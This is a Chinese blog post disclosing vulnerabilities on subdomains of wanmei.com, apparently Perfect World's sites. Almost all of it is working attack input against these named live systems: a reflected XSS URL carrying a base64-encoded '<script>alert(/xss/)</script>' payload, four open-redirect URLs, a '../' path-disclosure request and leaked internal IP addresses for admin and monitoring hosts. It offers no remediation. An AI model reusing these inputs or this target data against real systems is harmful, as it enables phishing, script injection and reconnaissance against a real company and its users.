当前位置: iick's blog > 网站漏洞 > 美时空分站XSS与网址跳转漏洞

美时空分站XSS与网址跳转漏洞

作者:hack1990 时间:11-11-04 阅读数:1475人阅读

Author:Insight-labs(Web Security Group)

1.XSS

http://shop.wanmei.com/search.php?encode=YToyOntzOjg6ImtleXdvcmRzIjtzOjMxOiI%2bPHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4gIjtzOjE4OiJzZWFyY2hfZW5jb2RlX3RpbWUiO2k6MTMxOTgwNzk0Mzt9

2.URL Redirect

http://shop.wanmei.com/affiche.php?ad_id=34&uri=[URL]

http://wulin2.wanmei.com/arrival/a.htm?to=[URL]

http://zhuxian.wanmei.com/arrival/a.htm?to=[URL]

http://yt.wanmei.com/arrival/a.htm?to=[URL]

3.爆路径

http://event2.wanmei.com/messagewall/blessingsListAction.do?path=../

 

4.internal ip

 ;; ANSWER SECTION:

gm.wanmei.com.   313       IN   A     10.15.0.82

;; ANSWER SECTION:

monitor.wanmei.com.    257  IN   A     10.15.0.13

# Nmap Security Scanner 7.0

上一篇:phpcms2008 代码执行 批量 getshell EXP

下一篇:UTF-7 XSS 常见利用方法

相关文章

发表评论